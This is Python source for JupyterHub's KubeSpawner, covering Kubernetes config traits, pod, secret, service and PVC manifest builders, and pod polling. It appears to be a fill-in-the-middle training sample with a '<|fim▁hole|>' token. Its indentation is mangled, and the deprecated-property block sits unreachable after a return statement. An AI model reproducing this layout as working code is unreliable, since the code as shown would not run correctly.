- `ReadWriteOnce` : the volume can be mounted as read-write by a single node
- `ReadOnlyMany` : the volume can be mounted read-only by many nodes
- `ReadWriteMany` : the volume can be mounted as read-write by many nodes
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/persistent-volumes/#access-modes>`__
for more information on how access modes work.
""",
)
storage_selector = Dict(
config=True,
help="""
The dictionary Selector labels used to match a PersistentVolumeClaim to
a PersistentVolume.
Default is None and means it will match based only on other storage criteria.
For example to match the Nodes that have a label of `content: jupyter` use::
c.KubeSpawner.storage_selector = {'matchLabels':{'content': 'jupyter'}}
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
lifecycle_hooks = Dict(
config=True,
help="""
Kubernetes lifecycle hooks to set on the spawned single-user pods.
The keys is name of hooks and there are only two hooks, postStart and preStop.
The values are handler of hook which executes by Kubernetes management system when hook is called.
Below is an sample copied from
`the Kubernetes documentation <https://kubernetes.io/docs/tasks/configure-pod-container/attach-handler-lifecycle-event/>`__::
c.KubeSpawner.lifecycle_hooks = {
"postStart": {
"exec": {
"command": ["/bin/sh", "-c", "echo Hello from the postStart handler > /usr/share/message"]
}
},
"preStop": {
"exec": {
"command": ["/usr/sbin/nginx", "-s", "quit"]
}
}
}
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/>`__
for more info on what lifecycle hooks are and why you might want to use them!
""",
)
init_containers = List(
config=True,
help="""
List of initialization containers belonging to the pod.
This list will be directly added under `initContainers` in the kubernetes pod spec,
so you should use the same structure. Each item in the dict must a field
of the `V1Container specification <https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#container-v1-core>`__
One usage is disabling access to metadata service from single-user
notebook server with configuration below::
c.KubeSpawner.init_containers = [{
"name": "init-iptables",
"image": "<image with iptables installed>",
"command": ["iptables", "-A", "OUTPUT", "-p", "tcp", "--dport", "80", "-d", "169.254.169.254", "-j", "DROP"],
"securityContext": {
"capabilities": {
"add": ["NET_ADMIN"]
}
}
}]
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/workloads/pods/init-containers/>`__
for more info on what init containers are and why you might want to use them!
To user this feature, Kubernetes version must greater than 1.6.
""",
)
extra_container_config = Dict(
config=True,
help="""
Extra configuration (e.g. ``envFrom``) for notebook container which is not covered by other attributes.
This dict will be directly merge into `container` of notebook server,
so you should use the same structure. Each item in the dict must a field
of the `V1Container specification <https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#container-v1-core>`__.
One usage is set ``envFrom`` on notebook container with configuration below::
c.KubeSpawner.extra_container_config = {
"envFrom": [{
"configMapRef": {
"name": "special-config"
}
}]
}
The key could be either a camelCase word (used by Kubernetes yaml, e.g.
``envFrom``) or a snake_case word (used by Kubernetes Python client,
e.g. ``env_from``).
""",
)
extra_pod_config = Dict(
config=True,
help="""
Extra configuration for the pod which is not covered by other attributes.
This dict will be directly merge into pod,so you should use the same structure.
Each item in the dict is field of pod configuration
which follows spec at https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podspec-v1-core
One usage is set restartPolicy and dnsPolicy with configuration below::
c.KubeSpawner.extra_pod_config = {
"restartPolicy": "OnFailure",
"dns_policy": "ClusterFirstWithHostNet"
}
The `key` could be either a camelCase word (used by Kubernetes yaml,
e.g. `restartPolicy`) or a snake_case word (used by Kubernetes Python
client, e.g. `dns_policy`).
""",
)
extra_containers = List(
config=True,
help="""
List of containers belonging to the pod which besides to the container generated for notebook server.
This list will be directly appended under `containers` in the kubernetes pod spec,
so you should use the same structure. Each item in the list is container configuration
which follows spec at https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#container-v1-core
One usage is setting crontab in a container to clean sensitive data with configuration below::
c.KubeSpawner.extra_containers = [{
"name": "crontab",
"image": "supercronic",
"command": ["/usr/local/bin/supercronic", "/etc/crontab"]
}]
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
scheduler_name = Unicode(
None,
allow_none=True,
config=True,
help="""
Set the pod's scheduler explicitly by name. See `the Kubernetes documentation <https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podspec-v1-core>`__
for more information.
""",
)
tolerations = List(
config=True,
help="""
List of tolerations that are to be assigned to the pod in order to be able to schedule the pod
on a node with the corresponding taints. See the official Kubernetes documentation for additional details
https://kubernetes.io/docs/concepts/configuration/taint-and-toleration/
Pass this field an array of `"Toleration" objects
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#toleration-v1-core
Example::
[
{
'key': 'key',
'operator': 'Equal',
'value': 'value',
'effect': 'NoSchedule'
},
{
'key': 'key',
'operator': 'Exists',
'effect': 'NoSchedule'
}
]
""",
)
node_affinity_preferred = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "PreferredSchedulingTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#preferredschedulingterm-v1-core
""",
)
node_affinity_required = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "NodeSelectorTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#nodeselectorterm-v1-core
""",
)
pod_affinity_preferred = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "WeightedPodAffinityTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#weightedpodaffinityterm-v1-core
""",
)
pod_affinity_required = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "PodAffinityTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podaffinityterm-v1-core
""",
)
pod_anti_affinity_preferred = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "WeightedPodAffinityTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#weightedpodaffinityterm-v1-core
""",
)
pod_anti_affinity_required = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "PodAffinityTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podaffinityterm-v1-core
""",
)
extra_resource_guarantees = Dict(
config=True,
help="""
The dictionary used to request arbitrary resources.
Default is None and means no additional resources are requested.
For example, to request 1 Nvidia GPUs::
c.KubeSpawner.extra_resource_guarantees = {"nvidia.com/gpu": "1"}
""",
)
extra_resource_limits = Dict(
config=True,
help="""
The dictionary used to limit arbitrary resources.
Default is None and means no additional resources are limited.
For example, to add a limit of 3 Nvidia GPUs::
c.KubeSpawner.extra_resource_limits = {"nvidia.com/gpu": "3"}
""",
)
delete_stopped_pods = Bool(
True,
config=True,
help="""
Whether to delete pods that have stopped themselves.
Set to False to leave stopped pods in the completed state,
allowing for easier debugging of why they may have stopped.
""",
)
profile_form_template = Unicode(
"""
<style>
/* The profile description should not be bold, even though it is inside the <label> tag */
#kubespawner-profiles-list label p {
font-weight: normal;
}
</style>
<div class='form-group' id='kubespawner-profiles-list'>
{% for profile in profile_list %}
<label for='profile-item-{{ profile.slug }}' class='form-control input-group'>
<div class='col-md-1'>
<input type='radio' name='profile' id='profile-item-{{ profile.slug }}' value='{{ profile.slug }}' {% if profile.default %}checked{% endif %} />
</div>
<div class='col-md-11'>
<strong>{{ profile.display_name }}</strong>
{% if profile.description %}
<p>{{ profile.description }}</p>
{% endif %}
</div>
</label>
{% endfor %}
</div>
""",
config=True,
help="""
Jinja2 template for constructing profile list shown to user.
Used when `profile_list` is set.
The contents of `profile_list` are passed in to the template.
This should be used to construct the contents of a HTML form. When
posted, this form is expected to have an item with name `profile` and
the value the index of the profile in `profile_list`.
""",
)
profile_list = Union(
trait_types=[List(trait=Dict()), Callable()],
config=True,
help="""
List of profiles to offer for selection by the user.
Signature is: `List(Dict())`, where each item is a dictionary that has two keys:
- `display_name`: the human readable display name (should be HTML safe)
- `slug`: the machine readable slug to identify the profile
(missing slugs are generated from display_name)
- `description`: Optional description of this profile displayed to the user.
- `kubespawner_override`: a dictionary with overrides to apply to the KubeSpawner
settings. Each value can be either the final value to change or a callable that
take the `KubeSpawner` instance as parameter and return the final value.
- `default`: (optional Bool) True if this is the default selected option
Example::
c.KubeSpawner.profile_list = [
{
'display_name': 'Training Env - Python',
'slug': 'training-python',
'default': True,
'kubespawner_override': {
'image': 'training/python:label',
'cpu_limit': 1,
'mem_limit': '512M',
}
}, {
'display_name': 'Training Env - Datascience',
'slug': 'training-datascience',
'kubespawner_override': {
'image': 'training/datascience:label',
'cpu_limit': 4,
'mem_limit': '8G',
}
}, {
'display_name': 'DataScience - Small instance',
'slug': 'datascience-small',
'kubespawner_override': {
'image': 'datascience/small:label',
'cpu_limit': 10,
'mem_limit': '16G',
}
}, {
'display_name': 'DataScience - Medium instance',
'slug': 'datascience-medium',
'kubespawner_override': {
'image': 'datascience/medium:label',
'cpu_limit': 48,
'mem_limit': '96G',
}
}, {
'display_name': 'DataScience - Medium instance (GPUx2)',
'slug': 'datascience-gpu2x',
'kubespawner_override': {
'image': 'datascience/medium:label',
'cpu_limit': 48,
'mem_limit': '96G',
'extra_resource_guarantees': {"nvidia.com/gpu": "2"},
}
}
]
Instead of a list of dictionaries, this could also be a callable that takes as one
parameter the current spawner instance and returns a list of dictionaries. The
callable will be called asynchronously if it returns a future, rather than
a list. Note that the interface of the spawner class is not deemed stable
across versions, so using this functionality might cause your JupyterHub
or kubespawner upgrades to break.
""",
)
priority_class_name = Unicode(
config=True,
help="""
The priority class that the pods will use.
See https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption for
more information on how pod priority works.
""",
)
delete_grace_period = Integer(
1,
config=True,
help="""
Time in seconds for the pod to be in `terminating` state before is forcefully killed.
Increase this if you need more time to execute a `preStop` lifecycle hook.
See https://kubernetes.io/docs/concepts/workloads/pods/pod/#termination-of-pods for
more information on how pod termination works.
Defaults to `1`.
""",
)
# deprecate redundant and inconsistent singleuser_ and user_ prefixes:
_deprecated_traits_09 = [
"singleuser_working_dir",
"singleuser_service_account",
"singleuser_extra_labels",
"singleuser_extra_annotations",
"singleuser_image_spec",
"singleuser_image_pull_policy",
"singleuser_image_pull_secrets",
"singleuser_node_selector",
"singleuser_uid",
"singleuser_fs_gid",
"singleuser_supplemental_gids",
"singleuser_privileged",
"singleuser_allow_privilege_escalation" "singleuser_lifecycle_hooks",
"singleuser_extra_pod_config",
"singleuser_init_containers",
"singleuser_extra_container_config",
"singleuser_extra_containers",
"user_storage_class",
"user_storage_pvc_ensure",
"user_storage_capacity",
"user_storage_extra_labels",
"user_storage_access_modes",
]
# other general deprecations:
_deprecated_traits = {
'image_spec': ('image', '0.10'),
}
# add the bulk deprecations from 0.9
for _deprecated_name in _deprecated_traits_09:
_new_name = _deprecated_name.split('_', 1)[1]
_deprecated_traits[_deprecated_name] = (_new_name, '0.9')
@validate('config')
def _handle_deprecated_config(self, proposal):
    """Migrate deprecated KubeSpawner config keys to their new names.

    For every (deprecated, (new, version)) pair in ``_deprecated_traits``,
    any value found under the deprecated key in the incoming config is
    popped and either moved to the new key, or discarded (with a warning)
    when the new key is also explicitly configured.
    """
    config = proposal.value
    if 'KubeSpawner' not in config:
        # nothing to check
        return config
    for _deprecated_name, (_new_name, version) in self._deprecated_traits.items():
        # for any `singleuser_name` deprecate in favor of `name`
        if _deprecated_name not in config.KubeSpawner:
            # nothing to do
            continue
        # remove deprecated value from config
        _deprecated_value = config.KubeSpawner.pop(_deprecated_name)
        self.log.warning(
            "KubeSpawner.%s is deprecated in %s. Use KubeSpawner.%s instead",
            _deprecated_name,
            version,
            _new_name,
        )
        if _new_name in config.KubeSpawner:
            # *both* config values found,
            # ignore deprecated config and warn about the collision
            _new_value = config.KubeSpawner[_new_name]
            # ignore deprecated config in favor of non-deprecated config
            self.log.warning(
                "Ignoring deprecated config KubeSpawner.%s = %r "
                " in favor of KubeSpawner.%s = %r",
                _deprecated_name,
                _deprecated_value,
                _new_name,
                _new_value,
            )
        else:
            # move deprecated config to its new home
            config.KubeSpawner[_new_name] = _deprecated_value
    return config
    # define properties for deprecated names
    # so we can propagate their values to the new traits.
    # most deprecations should be handled via config above,
    # but in case these are set at runtime, e.g. by subclasses
    # or hooks, hook this up.
    # The signature-order of these is funny
    # because the property methods are created with
    # functools.partial(f, name) so name is passed as the first arg
    # before self.
    def _get_deprecated(name, new_name, version, self):
        # warn about the deprecated name
        self.log.warning(
            "KubeSpawner.%s is deprecated in %s. Use KubeSpawner.%s",
            name,
            version,
            new_name,
        )
        return getattr(self, new_name)

    def _set_deprecated(name, new_name, version, self, value):
        # warn about the deprecated name
        self.log.warning(
            "KubeSpawner.%s is deprecated in %s. Use KubeSpawner.%s",
            name,
            version,
            new_name,
        )
        return setattr(self, new_name, value)

    # exec() runs in the class body, so each deprecated name becomes a
    # class-level `property` that forwards reads/writes to the new trait
    # (warning each time it is accessed).
    for _deprecated_name, (_new_name, _version) in _deprecated_traits.items():
        exec(
            """{0} = property(
    partial(_get_deprecated, '{0}', '{1}', '{2}'),
    partial(_set_deprecated, '{0}', '{1}', '{2}'),
)
""".format(
                _deprecated_name,
                _new_name,
                _version,
            )
        )
    del _deprecated_name
    def _expand_user_properties(self, template):
        """Expand a ``str.format`` template with escaped user/server fields.

        Available fields: {userid}, {username}, {unescaped_username},
        {legacy_escape_username}, {servername}, {unescaped_servername},
        {hubnamespace}.
        """
        # Make sure username and servername match the restrictions for DNS labels
        # Note: '-' is not in safe_chars, as it is being used as escape character
        safe_chars = set(string.ascii_lowercase + string.digits)
        raw_servername = self.name or ''
        safe_servername = escapism.escape(
            raw_servername, safe=safe_chars, escape_char='-'
        ).lower()
        hub_namespace = self._namespace_default()
        if hub_namespace == "default":
            # "default" is too generic for templated names; use "user" instead
            hub_namespace = "user"
        # legacy (pre-escapism) escaping, kept for backward-compatible templates
        legacy_escaped_username = ''.join(
            [s if s in safe_chars else '-' for s in self.user.name.lower()]
        )
        safe_username = escapism.escape(
            self.user.name, safe=safe_chars, escape_char='-'
        ).lower()
        rendered = template.format(
            userid=self.user.id,
            username=safe_username,
            unescaped_username=self.user.name,
            legacy_escape_username=legacy_escaped_username,
            servername=safe_servername,
            unescaped_servername=raw_servername,
            hubnamespace=hub_namespace,
        )
        # strip trailing - delimiter in case of empty servername.
        # k8s object names cannot have trailing -
        return rendered.rstrip("-")
def _expand_all(self, src):
if isinstance(src, list):
return [self._expand_all(i) for i in src]
elif isinstance(src, dict):
return {k: self._expand_all(v) for k, v in src.items()}
elif isinstance(src, str):
return self._expand_user_properties(src)
else:
return src
    def _build_common_labels(self, extra_labels):
        """Labels applied to every object created by this spawner.

        Precedence (last wins): username label < extra_labels < common_labels.
        """
        # Default set of labels, picked up from
        # https://github.com/helm/helm-www/blob/HEAD/content/en/docs/chart_best_practices/labels.md
        labels = {
            'hub.jupyter.org/username': escapism.escape(
                self.user.name, safe=self.safe_chars, escape_char='-'
            ).lower()
        }
        labels.update(extra_labels)
        labels.update(self.common_labels)
        return labels
def _build_pod_labels(self, extra_labels):
labels = self._build_common_labels(extra_labels)
labels.update(
{
'component': self.component_label,
'hub.jupyter.org/servername': self.name,
}
)
return labels
def _build_common_annotations(self, extra_annotations):
# Annotations don't need to be escaped
annotations = {'hub.jupyter.org/username': self.user.name}
if self.name:
annotations['hub.jupyter.org/servername'] = self.name
annotations.update(extra_annotations)
return annotations<|fim▁hole|> @default("ssl_alt_names")
def _default_ssl_alt_names(self):
return [
f"DNS:{self.dns_name}",
f"DNS:{self.pod_name}",
f"DNS:{self.pod_name}.{self.namespace}",
f"DNS:{self.pod_name}.{self.namespace}.svc",
]
    @default("ssl_alt_names_include_local")
    def _default_ssl_alt_names_include_local(self):
        # Pods are reached via their in-cluster DNS names, never localhost,
        # so local names are not added to the certificate.
        return False
get_pod_url = Callable(
default_value=None,
allow_none=True,
config=True,
help="""Callable to retrieve pod url
Called with (spawner, pod)
Must not be async
""",
)
def _get_pod_url(self, pod):
"""Return the pod url
Default: use pod.status.pod_ip (dns_name if ssl is enabled)
"""
if self.get_pod_url:
# custom get_pod_url hook
return self.get_pod_url(self, pod)
if getattr(self, "internal_ssl", False):
proto = "https"
hostname = self.dns_name
else:
proto = "http"
hostname = pod["status"]["podIP"]
if self.pod_connect_ip:
hostname = ".".join(
[
s.rstrip("-")
for s in self._expand_user_properties(self.pod_connect_ip).split(
"."
)
]
)
return "{}://{}:{}".format(
proto,
hostname,
self.port,
)
async def get_pod_manifest(self):
"""
Make a pod manifest that will spawn current user's notebook pod.
"""
if callable(self.uid):
uid = await gen.maybe_future(self.uid(self))
else:
uid = self.uid
if callable(self.gid):
gid = await gen.maybe_future(self.gid(self))
else:
gid = self.gid
if callable(self.fs_gid):
fs_gid = await gen.maybe_future(self.fs_gid(self))
else:
fs_gid = self.fs_gid
if callable(self.supplemental_gids):
supplemental_gids = await gen.maybe_future(self.supplemental_gids(self))
else:
supplemental_gids = self.supplemental_gids
if callable(self.container_security_context):
csc = await gen.maybe_future(self.container_security_context(self))
else:
csc = self.container_security_context
if callable(self.pod_security_context):
psc = await gen.maybe_future(self.pod_security_context(self))
else:
psc = self.pod_security_context
args = self.get_args()
real_cmd = None
if self.cmd:
real_cmd = self.cmd + args
elif args:
self.log.warning(
f"Ignoring arguments when using implicit command from image: {args}."
" Set KubeSpawner.cmd explicitly to support passing cli arguments."
)
labels = self._build_pod_labels(self._expand_all(self.extra_labels))
annotations = self._build_common_annotations(
self._expand_all(self.extra_annotations)
)
return make_pod(
name=self.pod_name,
cmd=real_cmd,
port=self.port,
image=self.image,
image_pull_policy=self.image_pull_policy,
image_pull_secrets=self.image_pull_secrets,
node_selector=self.node_selector,
uid=uid,
gid=gid,
fs_gid=fs_gid,
supplemental_gids=supplemental_gids,
privileged=self.privileged,
allow_privilege_escalation=self.allow_privilege_escalation,
container_security_context=csc,
pod_security_context=psc,
env=self.get_env(),
volumes=self._expand_all(self.volumes),
volume_mounts=self._expand_all(self.volume_mounts),
working_dir=self.working_dir,
labels=labels,
annotations=annotations,
cpu_limit=self.cpu_limit,
cpu_guarantee=self.cpu_guarantee,
mem_limit=self.mem_limit,
mem_guarantee=self.mem_guarantee,
extra_resource_limits=self.extra_resource_limits,
extra_resource_guarantees=self.extra_resource_guarantees,
lifecycle_hooks=self.lifecycle_hooks,
init_containers=self._expand_all(self.init_containers),
service_account=self._expand_all(self.service_account),
automount_service_account_token=self.automount_service_account_token,
extra_container_config=self.extra_container_config,
extra_pod_config=self._expand_all(self.extra_pod_config),
extra_containers=self._expand_all(self.extra_containers),
scheduler_name=self.scheduler_name,
tolerations=self.tolerations,
node_affinity_preferred=self.node_affinity_preferred,
node_affinity_required=self.node_affinity_required,
pod_affinity_preferred=self.pod_affinity_preferred,
pod_affinity_required=self.pod_affinity_required,
pod_anti_affinity_preferred=self.pod_anti_affinity_preferred,
pod_anti_affinity_required=self.pod_anti_affinity_required,
priority_class_name=self.priority_class_name,
ssl_secret_name=self.secret_name if self.internal_ssl else None,
ssl_secret_mount_path=self.secret_mount_path,
logger=self.log,
)
    def get_secret_manifest(self, owner_reference):
        """
        Make a secret manifest that contains the ssl certificates.

        The secret is owned by the pod (via ``owner_reference``) so it is
        garbage-collected by kubernetes when the pod is deleted.
        """
        labels = self._build_common_labels(self._expand_all(self.extra_labels))
        annotations = self._build_common_annotations(
            self._expand_all(self.extra_annotations)
        )
        return make_secret(
            name=self.secret_name,
            username=self.user.name,
            cert_paths=self.cert_paths,
            hub_ca=self.internal_trust_bundles['hub-ca'],
            owner_references=[owner_reference],
            labels=labels,
            annotations=annotations,
        )
    def get_service_manifest(self, owner_reference):
        """
        Make a service manifest for dns.

        The service shares the pod's name and is owned by the pod, so it is
        cleaned up automatically with the pod.
        """
        labels = self._build_common_labels(self._expand_all(self.extra_labels))
        annotations = self._build_common_annotations(
            self._expand_all(self.extra_annotations)
        )
        # TODO: validate that the service name
        return make_service(
            name=self.pod_name,
            port=self.port,
            servername=self.name,
            owner_references=[owner_reference],
            labels=labels,
            annotations=annotations,
        )
    def get_pvc_manifest(self):
        """
        Make a pvc manifest that will spawn current user's pvc.

        Unlike pods/secrets/services, the PVC is *not* owner-referenced:
        it must outlive the pod to preserve user storage.
        """
        labels = self._build_common_labels(self._expand_all(self.storage_extra_labels))
        labels.update({'component': 'singleuser-storage'})
        annotations = self._build_common_annotations({})
        storage_selector = self._expand_all(self.storage_selector)
        return make_pvc(
            name=self.pvc_name,
            storage_class=self.storage_class,
            access_modes=self.storage_access_modes,
            selector=storage_selector,
            storage=self.storage_capacity,
            labels=labels,
            annotations=annotations,
        )
def is_pod_running(self, pod):
"""
Check if the given pod is running
pod must be a dictionary representing a Pod kubernetes API object.
"""
# FIXME: Validate if this is really the best way
is_running = (
pod is not None
and pod["status"]["phase"] == 'Running'
and pod["status"]["podIP"] is not None
and "deletionTimestamp" not in pod["metadata"]
and all([cs["ready"] for cs in pod["status"]["containerStatuses"]])
)
return is_running
def pod_has_uid(self, pod):
"""
Check if the given pod exists and has a UID
pod must be a dictionary representing a Pod kubernetes API object.
"""
return bool(
pod and pod.get("metadata") and pod["metadata"].get("uid") is not None
)
    def get_state(self):
        """
        Save state required to reinstate this user's pod from scratch

        We save the `pod_name`, even though we could easily compute it,
        because JupyterHub requires you save *some* state! Otherwise
        it assumes your server is dead. This works around that.

        It's also useful for cases when the `pod_template` changes between
        restarts - this keeps the old pods around.
        """
        state = super().get_state()
        state['pod_name'] = self.pod_name
        return state
    def get_env(self):
        """Return the environment dict to use for the Spawner.

        Adds the image name on top of the base environment.
        See also: jupyterhub.Spawner.get_env
        """
        env = super(KubeSpawner, self).get_env()
        # deprecate image
        # JUPYTER_IMAGE_SPEC is the deprecated alias of JUPYTER_IMAGE
        env['JUPYTER_IMAGE_SPEC'] = self.image
        env['JUPYTER_IMAGE'] = self.image
        return env
    def load_state(self, state):
        """
        Load state from storage required to reinstate this user's pod

        Since this runs after `__init__`, this will override the generated `pod_name`
        if there's one we have saved in state. These are the same in most cases,
        but if the `pod_template` has changed in between restarts, it will no longer
        be the case. This allows us to continue serving from the old pods with
        the old names.
        """
        if 'pod_name' in state:
            self.pod_name = state['pod_name']
    @_await_pod_reflector
    async def poll(self):
        """
        Check if the pod is still running.

        Uses the same interface as subprocess.Popen.poll(): if the pod is
        still running, returns None. If the pod has exited, return the
        exit code if we can determine it, or 1 if it has exited but we
        don't know how. These are the return values JupyterHub expects.

        Note that a clean exit will have an exit code of zero, so it is
        necessary to check that the returned value is None, rather than
        just Falsy, to determine that the pod is still running.
        """
        # consult the shared pod reflector's cache rather than the API server
        ref_key = "{}/{}".format(self.namespace, self.pod_name)
        pod = self.pod_reflector.pods.get(ref_key, None)
        if pod is not None:
            if pod["status"]["phase"] == 'Pending':
                return None
            ctr_stat = pod["status"].get("containerStatuses")
            if ctr_stat is None:  # No status, no container (we hope)
                # This seems to happen when a pod is idle-culled.
                return 1
            for c in ctr_stat:
                # return exit code if notebook container has terminated
                if c["name"] == 'notebook':
                    if "terminated" in c["state"]:
                        # call self.stop to delete the pod
                        if self.delete_stopped_pods:
                            await self.stop(now=True)
                        return c["state"]["terminated"]["exitCode"]
                    break
            # pod running. Check and update server url if it changed!
            # only do this if fully running, not just starting up
            # and there's a stored url in self.server to check against
            if self.is_pod_running(pod) and self.server:

                def _normalize_url(url):
                    """Normalize url to be comparable

                    - parse with urlparse
                    - Ensures port is always defined
                    """
                    url = urlparse(url)
                    if url.port is None:
                        if url.scheme.lower() == "https":
                            url = url._replace(netloc=f"{url.hostname}:443")
                        elif url.scheme.lower() == "http":
                            url = url._replace(netloc=f"{url.hostname}:80")
                    return url

                pod_url = _normalize_url(self._get_pod_url(pod))
                server_url = _normalize_url(self.server.url)
                # netloc: only compare hostname:port, ignore path
                if server_url.netloc != pod_url.netloc:
                    # pod was rescheduled / IP changed; persist the new address
                    self.log.warning(
                        f"Pod {ref_key} url changed! {server_url.netloc} -> {pod_url.netloc}"
                    )
                    self.server.ip = pod_url.hostname
                    self.server.port = pod_url.port
                    self.db.commit()
            # None means pod is running or starting up
            return None
        # pod doesn't exist or has been deleted
        return 1
    @property
    def events(self):
        """Filter event-reflector to just this pods events

        Returns list of all events that match our pod_name
        since our ._last_event (if defined).
        ._last_event is set at the beginning of .start().
        """
        if not self.event_reflector:
            return []
        events = []
        for event in self.event_reflector.events:
            if event["involvedObject"]["name"] != self.pod_name:
                # only consider events for my pod name
                continue
            if self._last_event and event["metadata"]["uid"] == self._last_event:
                # saw last_event marker, ignore any previous events
                # and only consider future events
                # only include events *after* our _last_event marker
                # (resetting the accumulator drops everything seen so far)
                events = []
            else:
                events.append(event)
        return events
    async def progress(self):
        """
        This function is reporting back the progress of spawning a pod until
        self._start_future has fired.

        This is working with events parsed by the python kubernetes client,
        and here is the specification of events that is relevant to understand:
        ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#event-v1-core
        """
        if not self.events_enabled:
            return
        self.log.debug('progress generator: %s', self.pod_name)
        start_future = self._start_future
        progress = 0
        next_event = 0
        break_while_loop = False
        while True:
            # This logic avoids a race condition. self._start() will be invoked by
            # self.start() and almost directly set self._start_future. But,
            # progress() will be invoked via self.start(), so what happen first?
            # Due to this, the logic below is to avoid making an assumption that
            # self._start_future was set before this function was called.
            if start_future is None and self._start_future:
                start_future = self._start_future
            # Ensure we capture all events by inspecting events a final time
            # after the start_future signal has fired, we could have been in
            # .sleep() and missed something.
            if start_future and start_future.done():
                break_while_loop = True
            events = self.events
            len_events = len(events)
            if next_event < len_events:
                # emit only events not yet reported (index next_event onward)
                for i in range(next_event, len_events):
                    event = events[i]
                    # move the progress bar.
                    # Since we don't know how many events we will get,
                    # asymptotically approach 90% completion with each event.
                    # each event gets 33% closer to 90%:
                    #  30 50 63 72 78 82 84 86 87 88 88 89
                    progress += (90 - progress) / 3
                    yield {
                        'progress': int(progress),
                        'raw_event': event,
                        'message': "%s [%s] %s"
                        % (
                            event["lastTimestamp"] or event["eventTime"],
                            event["type"],
                            event["message"],
                        ),
                    }
                next_event = len_events
            if break_while_loop:
                break
            await asyncio.sleep(1)
    def _start_reflector(
        self,
        kind=None,
        reflector_class=ResourceReflector,
        replace=False,
        **kwargs,
    ):
        """Start a shared reflector on the KubeSpawner class

        kind: key for the reflector (e.g. 'pod' or 'events')
        reflector_class: Reflector class to be instantiated
        kwargs: extra keyword-args to be relayed to ReflectorClass

        If replace=False and the pod reflector is already running,
        do nothing.

        If replace=True, a running pod reflector will be stopped
        and a new one started (for recovering from possible errors).

        Reflectors are stored on the *class* (``self.__class__.reflectors``)
        so all spawner instances share one watch per kind.
        """
        key = kind
        ReflectorClass = reflector_class

        def on_reflector_failure():
            # a dead reflector means we can no longer track pods/events;
            # bring the whole hub down rather than serve stale state
            self.log.critical(
                "%s reflector failed, halting Hub.",
                key.title(),
            )
            sys.exit(1)

        previous_reflector = self.__class__.reflectors.get(key)
        if replace or not previous_reflector:
            self.__class__.reflectors[key] = ReflectorClass(
                parent=self,
                namespace=self.namespace,
                on_failure=on_reflector_failure,
                **kwargs,
            )
            asyncio.ensure_future(self.__class__.reflectors[key].start())
        if replace and previous_reflector:
            # we replaced the reflector, stop the old one
            asyncio.ensure_future(previous_reflector.stop())
        # return the current reflector
        return self.__class__.reflectors[key]
    def _start_watching_events(self, replace=False):
        """Start the events reflector

        If replace=False and the event reflector is already running,
        do nothing.

        If replace=True, a running pod reflector will be stopped
        and a new one started (for recovering from possible errors).
        """
        # only watch events whose involvedObject is a Pod
        return self._start_reflector(
            kind="events",
            reflector_class=EventReflector,
            fields={"involvedObject.kind": "Pod"},
            omit_namespace=self.enable_user_namespaces,
            replace=replace,
        )
def _start_watching_pods(self, replace=False):
"""Start the pod reflector
If replace=False and the pod reflector is already running,
do nothing.
If replace=True, a running pod reflector will be stopped
and a new one started (for recovering from possible errors).
"""
pod_reflector_class = PodReflector
pod_reflector_class.labels.update({"component": self.component_label})
return self._start_reflector(
"pods",
PodReflector,
omit_namespace=self.enable_user_namespaces,
replace=replace,
)
    def start(self):
        """Thin wrapper around self._start

        so we can hold onto a reference for the Future
        start returns, which we can use to terminate
        .progress()
        """
        self._start_future = asyncio.ensure_future(self._start())
        return self._start_future

    # uid of the most recent event seen before the current spawn began;
    # used by the `events` property to filter out stale events.
    _last_event = None
    async def _make_create_pod_request(self, pod, request_timeout):
        """
        Make an HTTP request to create the given pod

